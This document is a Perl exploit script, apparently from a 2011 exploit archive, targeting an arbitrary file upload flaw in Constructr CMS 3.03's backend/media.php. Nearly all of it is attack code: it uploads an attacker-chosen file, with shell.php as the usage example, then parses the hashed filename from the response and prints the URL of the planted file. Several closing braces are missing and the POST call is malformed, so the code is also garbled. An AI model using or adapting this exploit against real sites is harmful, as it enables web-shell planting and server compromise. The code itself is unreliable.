Constructr CMS 3.03 Arbitrary File Upload

2011-03-23 10:15:12

#!/usr/bin/env perl

# Constructr CMS 3.03 Arbitrary File Upload
# Author: plucky
# Email: [email protected]
# Vulnerable Page: /constructr/backend/media.php [line
# App Download:
# Date: 23/03/2011
# THX TO: yawn, shrod, h473 and DoMinO

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common qw( POST );

my $host = '';
my $file_to_upload = '';
my $new_file_name = '';
my $file_extension = '';

sub exploit_usage {

print 'Constructr CMS 3.03 Arbitrary File Upload' . "\n".
'-------------------------' . "\n".
'Author: plucky' . "\n".
'Email: [email protected]' . "\n".
'-------------------------' . "\n".
'Usage:' . "\n".
' perl [host]/[cms-path]/ /[path-file]/[file]' . "\n".
'Example:' . "\n".
' perl ' . $0 . ' /home/plucky/shell.php' . "\n";



sub file_parse {

my $file_name = '';
my $file_extension = '';
my $file_to_upload = '';
my $rfile_to_upload = '';

$rfile_to_upload = shift;
$file_to_upload = ${$rfile_to_upload};

$file_to_upload =~ m/\/([a-z0-9]+)\.([a-z]+)/i;

$file_name = $1;
$file_extension = $2;

return ( $file_name, $file_extension )


sub upload_file {

my $host = '';
my $rhost = '';
my $file_name = '';
my $file_extension = '';
my $response = '';
my $path = '';
my $html = '';
my $user_agent = '';
my $file_to_upload = '';
my $rfile_to_upload = '';
my $new_file_name = '';

( $rhost, $rfile_to_upload ) = @_;

$host = ${$rhost};
$file_to_upload = ${$rfile_to_upload};

$user_agent = LWP::UserAgent->new;
$path = $host . 'backend/media.php';

$response = $user_agent->post(
'create_file' => 'try',
'file' => [$file_to_upload],
'Content_Type' => 'form-data'

( $file_name, $file_extension ) = file_parse( \$file_to_upload );

$html = $response->decoded_content;
$html =~ m/show_path=([a-f0-9]{32})\.$file_extension">$file_name\.$file_extension<\/a>/i;

$new_file_name = $1;

return ( $new_file_name, $file_extension );


@ARGV == 2
? ( $host, $file_to_upload ) = @ARGV
: exploit_usage();

( $new_file_name, $file_extension ) = upload_file( \$host, \$file_to_upload );

print $host, 'data/workspace/uploads/', $new_file_name, '.', $file_extension, "\n";


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